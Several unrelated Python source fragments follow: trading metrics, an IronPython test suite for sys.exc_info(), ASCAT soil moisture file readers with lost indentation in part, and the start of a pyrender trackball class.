        dt = self.latest_dt
        dt_loc = self.latest_dt_loc
        period_label = dt.strftime("%Y-%m")
        rval = {
            'trading_days': self.num_trading_days,
            'benchmark_volatility':
            self.benchmark_volatility[dt_loc],
            'algo_volatility':
            self.algorithm_volatility[dt_loc],
            'treasury_period_return': self.treasury_period_return,
            # Though the two following keys say period return,
            # they would be more accurately called the cumulative return.
            # However, the keys need to stay the same, for now, for backwards
            # compatibility with existing consumers.
            'algorithm_period_return':
            self.algorithm_cumulative_returns[dt_loc],
            'benchmark_period_return':
            self.benchmark_cumulative_returns[dt_loc],
            'beta': self.beta[dt_loc],
            'alpha': self.alpha[dt_loc],
            'sharpe': self.sharpe[dt_loc],
            'sortino': self.sortino[dt_loc],
            'excess_return': self.excess_returns[dt_loc],
            'max_drawdown': self.max_drawdown,
            'max_leverage': self.max_leverage,
            'period_label': period_label
        }

        # check_entry filters out invalid entries (e.g. NaN) -> None.
        return {k: (None if check_entry(k, v) else v)
                for k, v in iteritems(rval)}

    def __repr__(self):
        statements = []
        for metric in self.METRIC_NAMES:
            value = getattr(self, metric)[-1]
            if isinstance(value, list):
                if len(value) == 0:
                    value = np.nan
                else:
                    value = value[-1]
            statements.append("{m}:{v}".format(m=metric, v=value))

        return '\n'.join(statements)

    def update_current_max(self):
        """Track the running maximum of cumulative returns (for drawdowns)."""
        if len(self.algorithm_cumulative_returns) == 0:
            return
        current_cumulative_return = \
            self.algorithm_cumulative_returns[self.latest_dt_loc]
        if self.current_max < current_cumulative_return:
            self.current_max = current_cumulative_return

    def calculate_max_leverage(self):
        """Return the max of the current leverage and the running maximum."""
        # The leverage is defined as: the gross_exposure/net_liquidation
        # gross_exposure = long_exposure + abs(short_exposure)
        # net_liquidation = ending_cash + long_exposure + short_exposure
        cur_leverage = self.algorithm_cumulative_leverages_cont[
            self.latest_dt_loc]

        return max(cur_leverage, self.max_leverage)
| |
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
# Test that sys.exc_info() is properly set.
from iptest.assert_util import *
import sys
# Rules:
# 1) thread has a current exception
# 2) except block sets current exception
# 3) when method returns (either normally, via exception, or via generator),
# it restores the current exception to what it was on function entry.
#
# exc_info() is pretty useless in a finally block. It may be non-null, but it's value
# depends on how exactly we got to execute the finally. In fact, in a finally, exc_info
# may be non-null, but not for the current exception.
# Or it may be null, even when there's an outstanding exception. $$$ is that true?
# return the current exception arg or None
# raise ValueError(15) ; E() returns 15
def E():
    """Return the first argument of the current exception, or None.

    Reads sys.exc_info()[1]; in this (Python 2 / IronPython) suite the
    exception value is indexable, so t[0] is the value passed to the
    exception constructor (e.g. 15 for ValueError(15)).
    """
    t = sys.exc_info()[1]
    # Identity comparison is the correct test for "no active exception".
    if t is None: return None
    return t[0]
# helper for easy asserts on E
def A(v):
    """Assert that the current exception's first argument (via E) equals v."""
    AreEqual(E(), v)
#--------------------------------------
# Tests
def test_simple():
    """exc_info is set inside an except block and survives past it."""
    A(None)
    try:
        raise ValueError(15)
    except:
        A(15)
    A(15) # still valid after exception block, but still in function
# test setting in except params
def test_excep_params():
    """exc_info is already set while evaluating the except-clause expression."""
    def t(): # called as argument in except clause
        A(63)
        return TypeError
    def f():
        try:
            raise ValueError(63)
        except t(): # not matching
            Assert(False)
    try:
        f()
    except:
        A(63)
# raise new ex out of catch; check in finally
def test_except_rethrow():
    """Raising a new exception from a handler updates exc_info only once a new except block runs."""
    def f():
        try:
            raise ValueError(81)
        except:
            A(81)
            # raise a new exception type. exc_info doesn't get updated
            # until we hit a new except block
            raise ValueError(43)
        finally:
            # still using the original exc since we haven't hit a new exc block yet.
            A(81)
    try:
        f()
    except:
        A(43)
    A(43)
# finally, same function as active except, exception path
def test_fin_except():
    """A finally in the same function as an executed except block sees exc_info."""
    A(None)
    try:
        raise ValueError(20)
    except:
        A(20)
    finally:
        A(20) # active from except block
    A(20) # still active
# finally doesnt see exc_info when there's no catcher.
def test_fin_except2():
    """A finally with no except block in its function does not see exc_info."""
    def f1():
        A(None)
        raise ValueError(20)
    def f2():
        A(None)
        try:
            f1() # throw from a different function
            Assert(False)
        finally:
            # we should be here via the exceptional path.
            # but since there's no except block in here, exc_info not set.
            A(None)
        Assert(False)
    try:
        f2()
    except:
        A(20)
    A(20)
# Finally w/o an except block does not see the exception.
# compare to test_fin_except()
def helper_fin_no_except():
    """Raise through a try/finally with no except: exc_info stays unset."""
    A(None)
    try:
        raise ValueError(15)
    finally:
        A(None) # no except block, so not set.
def test_fin_no_except():
    """Catch the exception escaping helper_fin_no_except; exc_info set here."""
    try:
        helper_fin_no_except()
    except:
        A(15)
    A(15)
#
# inactive except block.
# The mere presence of an except block is enough to set exc_info(). We don't
# need to actually execute the handlers.
def helper_fin_inactive():
    """Even a non-matching except clause causes exc_info to be set."""
    A(None)
    try:
        raise ValueError(20)
    except TypeError: # mismatched, still causes exc_info() to be set
        Assert(False)
    finally:
        A(20) # still set even from inactive block
    A(20) # still active
def test_fin_inactive():
    """Drive helper_fin_inactive and swallow the escaping exception."""
    try:
        helper_fin_inactive()
    except: # prevent from going unhandled
        A(20)
# Non exception path
def test_fin_normal():
    """finally on the non-exception path sees no exc_info."""
    A(None)
    try:
        pass
    finally:
        A(None)
    A(None)
# Nested
def test_nested():
    """Nested try blocks: exc_info reflects the most recently handled exception."""
    try:
        try:
            try:
                raise ValueError(15)
            except:
                A(15)
            A(15)
        except:
            Assert(False)
        A(15)
        try:
            A(15)
            # Now raise a new exception. This becomes the current exc_info() value.
            raise ValueError(20)
        except:
            A(20)
        A(20)
    except:
        Assert(False)
    A(20)
# Child function inherits exc_info() from parent, but can't change parents.
# only changed by a function having an except block.
def test_call():
    """A callee inherits the caller's exc_info; changes are undone on return."""
    def f():
        A(7) # parent is already in a except block.
        try:
            raise ValueError(20)
        except:
            A(20)
        A(20)
        # will be restored to 7 on function return
    #
    try:
        raise ValueError(7)
    except:
        A(7)
        f()
        A(7)
# Test with multiple calls and ensure value is restored
def test_call2():
    """Multiple nested calls each restore the caller's exc_info on return."""
    def f3a():
        A(55)
        try:
            raise ValueError(11)
        except:
            A(11)
        A(11)
    def f3b():
        A(55)
        try:
            raise ValueError(22)
        except:
            A(22)
            return # return from Except, swallows Ex
        Assert(False)
    def f2():
        A(55)
        f3a()
        A(55)
        f3b()
        A(55)
    #
    try:
        A(None)
        raise ValueError(55)
    except:
        A(55)
        f2()
        A(55)
# Still set in finally on return.
def test_ex_fin():
    """exc_info set by an except block is still visible in finally on return."""
    try:
        try:
            raise ValueError(25)
        except:
            A(25)
            return 7
    finally:
        # still set from the except block
        A(25)
# like test_ex_fin, but when we split into an inner function, it gets reset
def test_funcs():
    """exc_info resets across function boundaries: set inside f, not in its caller's finally."""
    def f():
        try:
            try:
                raise ValueError(27)
            except:
                A(27)
                raise # rethrow
        finally:
            # on exceptional path. Since this function had a except clause
            # in the function, exc_info() is still set.
            A(27)
    try:
        try:
            f()
        finally:
            A(None) # exc_info reset since thrown from different function
    except:
        A(27)
        pass
# ???
# Tests splitting across multiple functions to show reset
def f():
    pass
# Test with exc_info and generators.
# The first yield in the except block is a return from the function and clears
# the current exception status.
def test_generator():
    """A generator's exc_info follows its caller: reset on yield, inherited on next()."""
    def f():
        try:
            raise ValueError(3)
        except:
            A(3)
            yield 1 # this will reset exc_info
        A(None)
        yield 2
        A(5) # pick up from caller
        try:
            yield 3 # generator will call next when exc_info=Val(6) here.
        finally:
            # We're in the non-exception path of a finally, but still have exc_info set since
            # generator was called from a catch block.
            A(6)
            yield 4
        A(6) # still set from generator's caller
        A(6) #
        yield 5
    # call the generator
    g=f()
    AreEqual(next(g), 1)
    A(None) # generator's exc value shouldn't taint the caller
    AreEqual(next(g), 2)
    A(None) # clear after returning from yield
    try:
        raise ValueError(5) # New exception!
    except:
        A(5)
        # Now call back into the generator with a new exc_info!
        AreEqual(next(g), 3)
        A(5)
    A(5)
    try:
        A(5)
        raise ValueError(6) # New exception
    except:
        A(6)
        # this will execute a finally in the generator.
        AreEqual(next(g), 4)
        A(6)
    A(6)
    AreEqual(next(g), 5)
# throw out of generator
# ensure that exc_info() is cleared.
def test_gen_throw():
    """Throwing into a generator: exc_info is cleared once the generator exits."""
    def f():
        try:
            yield 1 # caller will g.Throw() from here
        except:
            A(87)
            raise ValueError(22) # throw new error
    #
    g=f()
    A(None)
    AreEqual(next(g), 1)
    A(None)
    try:
        try:
            g.throw(ValueError(87))
            Assert(False)
        finally:
            # exceptional path.
            # exc_info should have been cleared on exiting generator.
            A(None)
    except:
        A(22)
    A(22)
#---------------------------------------------------------------------
#
# Test sys.exc_clear(), which was added in Python 2.3
# This clears the last exception status.
#
#---------------------------------------------------------------------
# simple case of clear in an except block.
def test_clear_simple():
    """sys.exc_clear() inside an except block resets exc_info."""
    try:
        raise ValueError(12)
    except:
        A(12)
        sys.exc_clear()
        A(None)
    A(None)
# cases with nesting.
def test_clear_nested():
    """sys.exc_clear() in a nested handler also clears the outer exc_info."""
    try:
        raise ValueError(13)
    except:
        try:
            A(13)
            raise ValueError(54)
        except:
            A(54)
            sys.exc_clear()
            A(None)
        A(None)
    A(None)
#
def test_clear_nested_func():
    """sys.exc_clear() in a callee does not affect the caller's exc_info."""
    def f():
        try:
            A(13)
            raise ValueError(54)
        except:
            A(54)
            sys.exc_clear()
            A(None)
        A(None) # will be restored after func returns
    #
    try:
        raise ValueError(13)
    except:
        A(13)
        f() # calls sys.exc_clear()
        A(13) # still restored even after clear
    A(13)
# Test clearing when there isn't an active exception (outside except block)
def test_clear_no_active_ex():
    """sys.exc_clear() is a harmless no-op when no exception is active."""
    A(None)
    sys.exc_clear()
    A(None)
    try:
        sys.exc_clear()
        A(None)
    except:
        pass
    try:
        pass
    finally:
        sys.exc_clear()
        A(None)
    A(None)
#---------------------------------------------------------------------
# With!
#---------------------------------------------------------------------
#========================================================
# With's Pep (http://www.python.org/dev/peps/pep-0343/) says the
# __exit__ can be invoked by an except block,
# but unlike a normal except, that shouldn't set sys.exc_info().
# a manager class to use 'with' statement
class ManBase():
    """Base context manager for the 'with' tests; asserts exc_info is unset."""
    def __enter__(self):
        A(None)
        pass
    # exit is invoked when 'with' body exits (either via exception, branch)
    def __exit__(self, t,v, tb):
        A(None)
        return True # swallow exception
# Simple case, no exception set.
def test_with_simple():
    """'with' on the non-exception path leaves exc_info unset."""
    class M1(ManBase):
        pass
    with M1():
        pass
# with.__exit__ doesn't see exception in exception case.
def test_with_fail():
    """__exit__ receives the exception as arguments, not via sys.exc_info()."""
    class M2(ManBase):
        # exit is invoked when 'with' body exits (either via exception, branch)
        def __exit__(self, t,v, tb):
            AreEqual(v[0], 15) # exception passed in as local
            if is_ironpython: #http://ironpython.codeplex.com/workitem/27990
                A(None) # but sys.exc_info() should not be set!!
            else:
                A(15)
            return True # swallow exception
    #
    # With.__exit__ does not see current exception
    with M2():
        raise ValueError(15)
# call 'with' from an except block
def test_with_except_pass():
    """'with' inside an except block: __enter__/__exit__ see the outer exc_info."""
    class M2(ManBase):
        def __enter__(self):
            A(15)
        # exit is invoked when 'with' body exits (either via exception, branch)
        def __exit__(self, t,v, tb):
            AreEqual(v, None) #
            A(15) #
            return True # swallow exception
    #
    # With.__exit__ does not see current exception
    try:
        raise ValueError(15)
    except:
        A(15)
        with M2():
            A(15)
            pass
        A(15)
# call 'with' from an except block, do failure case
def test_with_except_fail():
    """'with' body raising inside an except block: __exit__ gets the new exception."""
    class M2(ManBase):
        def __enter__(self):
            A(15)
        # exit is invoked when 'with' body exits (either via exception, branch)
        def __exit__(self, t,v, tb):
            AreEqual(v[0], 34) # gets failure from With block
            if is_ironpython: #http://ironpython.codeplex.com/workitem/27990
                A(15) # gets failure from sys.exc_info() which is from outer except block
            else:
                A(34)
            return True # swallow exception
    #
    # With.__exit__ does not see current exception
    try:
        raise ValueError(15)
    except:
        A(15)
        with M2():
            A(15)
            raise ValueError(34)
        if is_ironpython: #http://ironpython.codeplex.com/workitem/27990
            A(15)
        else:
            A(34)
run_test(__name__)
| |
# Copyright (c) 2021, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Readers for H SAF soil moisture products.
"""
import os
import glob
import warnings
from datetime import datetime
from collections import defaultdict
import numpy as np
try:
import pygrib
except ImportError:
warnings.warn(
'pygrib can not be imported GRIB files (H14) can not be read.')
from ascat.utils import tmp_unzip
from ascat.file_handling import ChronFiles
from ascat.read_native.bufr import BUFRReader
from ascat.eumetsat.level2 import AscatL2File
from ascat.read_native.cdr import AscatGriddedNcTs
class H08Bufr:
def __init__(self, filename):
"""
Initialize H08Bufr.
Parameters
----------
filename : str
Filename.
"""
if os.path.splitext(filename)[1] == '.gz':
self.filename = tmp_unzip(filename)
else:
self.filename = filename
def read(self):
"""
Read file.
Returns
-------
data : numpy.ndarray
H08 data.
"""
data = defaultdict(list)
with BUFRReader(self.filename) as bufr:
lons = []
ssm = []
ssm_noise = []
ssm_corr_flag = []
ssm_proc_flag = []
for i, message in enumerate(bufr.messages()):
if i == 0:
# first message is just lat, lon extent
# check if any data in bbox
# lon_min, lon_max = message[0, 2], message[0, 3]
lat_min, lat_max = message[0, 4], message[0, 5]
else:
# first 5 elements are there only once, after that,
# 4 elements are repeated till the end of the array
# these 4 are ssm, ssm_noise, ssm_corr_flag and
# ssm_proc_flag each message contains the values for
# 120 lons between lat_min and lat_max the grid spacing
# is 0.00416667 degrees
lons.append(message[:, 0])
lat_min = message[0, 1]
lat_max = message[0, 2]
ssm.append(message[:, 4::4])
ssm_noise.append(message[:, 5::4])
ssm_corr_flag.append(message[:, 6::4])
ssm_proc_flag.append(message[:, 7::4])
ssm = np.rot90(np.vstack(ssm)).astype(np.float32)
ssm_noise = np.rot90(np.vstack(ssm_noise)).astype(np.float32)
ssm_corr_flag = np.rot90(
np.vstack(ssm_corr_flag)).astype(np.float32)
ssm_proc_flag = np.rot90(
np.vstack(ssm_proc_flag)).astype(np.float32)
lats_dim = np.linspace(lat_max, lat_min, ssm.shape[0])
lons_dim = np.concatenate(lons)
data = {'ssm': ssm, 'ssm_noise': ssm_noise,
'proc_flag': ssm_proc_flag, 'corr_flag': ssm_corr_flag}
# if there are is a gap in the image it is not a 2D array in
# lon, lat space but has a jump in latitude or longitude
# detect a jump in lon or lat spacing
lon_jump_ind = np.where(np.diff(lons_dim) > 0.00418)[0]
if lon_jump_ind.size > 1:
print("More than one jump in longitude")
if lon_jump_ind.size == 1:
lon_jump_ind = lon_jump_ind[0]
diff_lon_jump = np.abs(
lons_dim[lon_jump_ind] - lons_dim[lon_jump_ind + 1])
missing_elements = int(np.round(diff_lon_jump / 0.00416666))
missing_lons = np.linspace(lons_dim[lon_jump_ind],
lons_dim[lon_jump_ind + 1],
missing_elements,
endpoint=False)
# fill up longitude dimension to full grid
lons_dim = np.concatenate([lons_dim[:lon_jump_ind],
missing_lons,
lons_dim[lon_jump_ind + 1:]])
# fill data with NaN values
empty = np.empty((lats_dim.shape[0], missing_elements))
empty.fill(1e38)
for key in data:
data[key] = np.concatenate(
[data[key][:, :lon_jump_ind],
empty, data[key][:, lon_jump_ind + 1:]], axis=1)
lat_jump_ind = np.where(np.diff(lats_dim) > 0.00418)[0]
if lat_jump_ind.size > 1:
print("More than one jump in latitude")
if lat_jump_ind.size == 1:
diff_lat_jump = np.abs(
lats_dim[lat_jump_ind] - lats_dim[lat_jump_ind + 1])
missing_elements = np.round(diff_lat_jump / 0.00416666)
missing_lats = np.linspace(lats_dim[lat_jump_ind],
lats_dim[lat_jump_ind + 1],
missing_elements,
endpoint=False)
# fill up longitude dimension to full grid
lats_dim = np.concatenate(
[lats_dim[:lat_jump_ind], missing_lats,
lats_dim[lat_jump_ind + 1:]])
# fill data with NaN values
empty = np.empty((missing_elements, lons_dim.shape[0]))
empty.fill(1e38)
for key in data:
data[key] = np.concatenate(
[data[key][:lat_jump_ind, :], empty,
data[key][lat_jump_ind + 1:, :]], axis=0)
data['lon'], data['lat'] = np.meshgrid(lons_dim, lats_dim)
return data
def close(self):
    """
    Close file.

    No-op: nothing is held open between reads, so there is nothing to
    release.  Kept so the reader matches the close() interface of the
    other file classes in this module.
    """
    pass
class H08BufrFileList(ChronFiles):
    """
    Reads H SAF H08 data (BUFR files organized in monthly subfolders).
    """

    def __init__(self, path):
        """
        Initialize.

        Parameters
        ----------
        path : str
            Root path of the H08 BUFR archive.
        """
        fn_templ = 'h08_{date}*.buf'
        sf_templ = {'month': 'h08_{date}_buf'}

        super().__init__(path, H08Bufr, fn_templ, sf_templ=sf_templ)

    def _fmt(self, timestamp):
        """
        Definition of filename and subfolder format.

        Parameters
        ----------
        timestamp : datetime
            Time stamp.

        Returns
        -------
        fn_fmt : dict
            Filename format.
        sf_fmt : dict
            Subfolder format.
        """
        fn_read_fmt = {'date': timestamp.strftime('%Y%m%d_%H%M%S')}
        sf_read_fmt = {'month': {'date': timestamp.strftime('%Y%m')}}
        fn_write_fmt = None
        sf_write_fmt = None

        return fn_read_fmt, sf_read_fmt, fn_write_fmt, sf_write_fmt

    def _parse_date(self, filename):
        """
        Parse date from filename.

        Parameters
        ----------
        filename : str
            Filename (expected form 'h08_YYYYMMDD_HHMMSS...').

        Returns
        -------
        date : datetime
            Parsed date.
        """
        return datetime.strptime(os.path.basename(filename)[4:19],
                                 '%Y%m%d_%H%M%S')

    def read_period(self, dt_start, dt_end, delta):
        """
        Read period not implemented.

        Raises
        ------
        NotImplementedError
            Always.
        """
        # Fix: 'self' was missing from the signature, so an instance call
        # would silently bind the instance to 'dt_start'.
        raise NotImplementedError
class AscatNrtBufrFileList(ChronFiles):
    """
    Class reading ASCAT NRT BUFR files.
    """

    def __init__(self, root_path, product_id='*', filename_template=None,
                 subfolder_template=None):
        """
        Initialize.

        Parameters
        ----------
        root_path : str
            Root path of the file archive.
        product_id : str, optional
            Product identifier used in the filename (default: '*').
        filename_template : str, optional
            Filename template (default: '{product_id}_{date}*.buf').
        subfolder_template : dict, optional
            Subfolder template (default: None, i.e. flat directory).
        """
        if filename_template is None:
            filename_template = '{product_id}_{date}*.buf'

        self.product_id = product_id

        super().__init__(root_path, AscatL2File, filename_template,
                         sf_templ=subfolder_template)

    def _fmt(self, timestamp):
        """
        Definition of filename and subfolder format.

        Parameters
        ----------
        timestamp : datetime
            Time stamp.

        Returns
        -------
        fn_fmt : dict
            Filename format.
        sf_fmt : dict
            Subfolder format.
        """
        fn_read_fmt = {'date': timestamp.strftime('%Y%m%d_%H%M%S'),
                       'product_id': self.product_id}
        sf_read_fmt = None
        fn_write_fmt = None
        sf_write_fmt = None

        return fn_read_fmt, sf_read_fmt, fn_write_fmt, sf_write_fmt

    def _parse_date(self, filename):
        """
        Parse date from filename.

        Parameters
        ----------
        filename : str
            Filename.

        Returns
        -------
        date : datetime
            Parsed date.
        """
        # Fix: '%Y%m%d%_H%M%S' was malformed ('%_H' is not a valid strptime
        # directive); the separator belongs before '%H'.
        # NOTE(review): the [4:19] slice assumes a 3-character product id
        # followed by '_' — confirm for all product ids used with this class.
        return datetime.strptime(os.path.basename(filename)[4:19],
                                 '%Y%m%d_%H%M%S')

    def _merge_data(self, data):
        """
        Merge data.

        Parameters
        ----------
        data : list
            List of array.

        Returns
        -------
        data : numpy.ndarray
            Merged data.
        """
        return np.hstack(data)
class H14Grib:
    """
    Class reading H14 soil moisture in GRIB format.
    """

    def __init__(self, filename, expand_grid=True,
                 metadata_fields=['units', 'name']):
        """
        Parameters
        ----------
        filename : str
            Path of the GRIB file to read.
        expand_grid : boolean, optional
            if set the images will be expanded to a 2D image during reading
            if false the images will be returned as 1D arrays on the
            reduced gaussian grid
            Default: True
        metadata_fields: list, optional
            fields of the message to put into the metadata dictionary.
            NOTE(review): mutable default argument — safe only as long as
            callers never mutate the list they receive.
        """
        self.filename = filename
        self.expand_grid = expand_grid
        self.metadata_fields = metadata_fields
        # pygrib 1.x and 2.x name GRIB message parameters differently;
        # remember which API we are talking to (first digit of the version).
        self.pygrib1 = True

        if int(pygrib.__version__[0]) > 1:
            self.pygrib1 = False

    def read(self, timestamp=None):
        """
        Read specific image for given datetime timestamp.

        Parameters
        ----------
        timestamp : datetime.datetime
            exact observation timestamp of the image that should be read

        Returns
        -------
        data : dict
            dictionary of numpy arrays that hold the image data for each
            variable of the dataset
        """
        # Map the version-specific GRIB parameter names onto stable layer
        # names for the four soil moisture layers.
        if self.pygrib1:
            param_names = {'40': 'SM_layer1_0-7cm',
                           '41': 'SM_layer2_7-28cm',
                           '42': 'SM_layer3_28-100cm',
                           '43': 'SM_layer4_100-289cm'}
        else:
            param_names = {
                'SWI1 Soil wetness index in layer 1': 'SM_layer1_0-7cm',
                'SWI2 Soil wetness index in layer 2': 'SM_layer2_7-28cm',
                'SWI3 Soil wetness index in layer 3': 'SM_layer3_28-100cm',
                'SWI4 Soil wetness index in layer 4': 'SM_layer4_100-289cm',
                'Soil wetness index in layer 1': 'SM_layer1_0-7cm',
                'Soil wetness index in layer 2': 'SM_layer2_7-28cm',
                'Soil wetness index in layer 3': 'SM_layer3_28-100cm',
                'Soil wetness index in layer 4': 'SM_layer4_100-289cm'}

        data = {}
        metadata = {}

        with pygrib.open(self.filename) as grb:
            for i, message in enumerate(grb):
                # presumably toggles expansion of the reduced Gaussian grid
                # to a full 2D grid — see pygrib docs; TODO confirm.
                message.expand_grid(self.expand_grid)
                # NOTE(review): lat/lons are taken from the message at
                # enumerate index 1 (the second message) — confirm this is
                # intended and not an off-by-one for index 0.
                if i == 1:
                    data['lat'], data['lon'] = message.latlons()

                data[param_names[message['parameterName']]] = message.values

                # read and store metadata
                md = {}
                for k in self.metadata_fields:
                    if message.valid_key(k):
                        md[k] = message[k]
                metadata[param_names[message['parameterName']]] = md

        # NOTE(review): 'metadata' is collected above but never returned or
        # stored — either dead code or a missing part of the return value.
        return data

    def close(self):
        # No persistent file handle: pygrib.open() is used as a context
        # manager inside read(), so there is nothing to close here.
        pass
class H14GribFileList(ChronFiles):
    """
    Reads H SAF H14 data (GRIB files organized in monthly subfolders).
    """

    def __init__(self, path):
        """
        Initialize.

        Parameters
        ----------
        path : str
            Root path of the H14 GRIB archive.
        """
        fn_templ = 'H14_{date}.grib'
        sf_templ = {'month': 'h14_{date}_grib'}

        super().__init__(path, H14Grib, fn_templ, sf_templ=sf_templ)

    def _fmt(self, timestamp):
        """
        Definition of filename and subfolder format.

        Parameters
        ----------
        timestamp : datetime
            Time stamp.

        Returns
        -------
        fn_fmt : dict
            Filename format.
        sf_fmt : dict
            Subfolder format.
        """
        fn_read_fmt = {'date': timestamp.strftime('%Y%m%d%H')}
        sf_read_fmt = {'month': {'date': timestamp.strftime('%Y%m')}}
        fn_write_fmt = None
        sf_write_fmt = None

        return fn_read_fmt, sf_read_fmt, fn_write_fmt, sf_write_fmt

    def _parse_date(self, filename):
        """
        Parse date from filename.

        Parameters
        ----------
        filename : str
            Filename (expected form 'H14_YYYYMMDDHH.grib').

        Returns
        -------
        date : datetime
            Parsed date.
        """
        return datetime.strptime(os.path.basename(filename)[4:15], '%Y%m%d%H')

    def read_period(self, dt_start, dt_end, delta):
        """
        Read period not implemented.

        Raises
        ------
        NotImplementedError
            Always.
        """
        # Fix: 'self' was missing from the signature, so an instance call
        # would silently bind the instance to 'dt_start'.
        raise NotImplementedError()
class AscatSsmDataRecord(AscatGriddedNcTs):
    """
    Class reading Metop ASCAT soil moisture data record.
    """

    def __init__(self, cdr_path, grid_path, fn_format=None,
                 grid_filename='TUW_WARP5_grid_info_2_2.nc',
                 static_layer_path=None, **kwargs):
        """
        Initialize.

        Parameters
        ----------
        cdr_path : str
            Path to Climate Data Record (CDR) data set.
        grid_path : str
            Path to grid file.
        fn_format : str, optional
            Filename format; derived from the first NetCDF file found in
            cdr_path when not given.
        grid_filename : str
            Name of grid file.
        static_layer_path : str
            Path to static layer files.

        Raises
        ------
        RuntimeError
            If fn_format is None and cdr_path contains no NetCDF files.

        Attributes
        ----------
        grid : pygeogrids.CellGrid
            Cell grid.
        """
        if fn_format is None:
            # Derive the filename format from the version prefix of the
            # first NetCDF file in the CDR directory.
            nc_files = glob.glob(os.path.join(cdr_path, '*.nc'))
            if not nc_files:
                raise RuntimeError('No files found')
            prefix = os.path.basename(nc_files[0]).rsplit('_', 1)[0]
            fn_format = '{:}_{{:04d}}'.format(prefix)

        super().__init__(cdr_path, fn_format,
                         os.path.join(grid_path, grid_filename),
                         static_layer_path, **kwargs)
| |
# Copied from
# https://github.com/mmatl/pyrender/blob/master/pyrender/trackball.py
# MIT License
#
# Copyright (c) 2019 Matthew Matl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Trackball class for 3D manipulation of viewpoints.
"""
import numpy as np
from .. import transformations
class Trackball(object):
    """A trackball class for creating camera transforms from mouse movements.

    Two camera-to-world poses are kept: ``_pose`` is the pose at the time
    of the last mouse press (the anchor for the current drag) and
    ``_n_pose`` is the pose including the drag in progress.  The public
    ``pose`` property always exposes ``_n_pose``.
    """
    STATE_ROTATE = 0  # drag orbits the camera around the target
    STATE_PAN = 1     # drag translates the camera in the view plane
    STATE_ROLL = 2    # drag rolls the camera about its view axis
    STATE_ZOOM = 3    # drag moves the camera along its view axis

    def __init__(self, pose, size, scale,
                 target=np.array([0.0, 0.0, 0.0])):
        """Initialize a trackball with an initial camera-to-world pose
        and the given parameters.

        Parameters
        ----------
        pose : [4,4]
            An initial camera-to-world pose for the trackball.

        size : (float, float)
            The width and height of the camera image in pixels.

        scale : float
            The diagonal of the scene's bounding box --
            used for ensuring translation motions are sufficiently
            fast for differently-sized scenes.

        target : (3,) float
            The center of the scene in world coordinates.
            The trackball will revolve around this point.
        """
        self._size = np.array(size)
        self._scale = float(scale)

        self._pose = pose
        self._n_pose = pose

        self._target = target
        self._n_target = target

        self._state = Trackball.STATE_ROTATE

    @property
    def pose(self):
        """autolab_core.RigidTransform : The current camera-to-world pose.
        """
        return self._n_pose

    def set_state(self, state):
        """Set the state of the trackball in order to change the effect of
        dragging motions.

        Parameters
        ----------
        state : int
            One of Trackball.STATE_ROTATE, Trackball.STATE_PAN,
            Trackball.STATE_ROLL, and Trackball.STATE_ZOOM.
        """
        self._state = state

    def resize(self, size):
        """Resize the window.

        Parameters
        ----------
        size : (float, float)
            The new width and height of the camera image in pixels.
        """
        self._size = np.array(size)

    def down(self, point):
        """Record an initial mouse press at a given point.

        This anchors the current pose/target as the reference for the
        subsequent drag() calls; drag() must not be called before down().

        Parameters
        ----------
        point : (2,) int
            The x and y pixel coordinates of the mouse press.
        """
        self._pdown = np.array(point, dtype=np.float32)
        self._pose = self._n_pose
        self._target = self._n_target

    def drag(self, point):
        """Update the trackball during a drag.

        Parameters
        ----------
        point : (2,) int
            The current x and y pixel coordinates of the mouse during a drag.
            This will compute a movement for the trackball with the relative
            motion between this point and the one marked by down().
        """
        point = np.array(point, dtype=np.float32)
        # Total drag offset since the initial press (not since last drag()).
        dx, dy = point - self._pdown
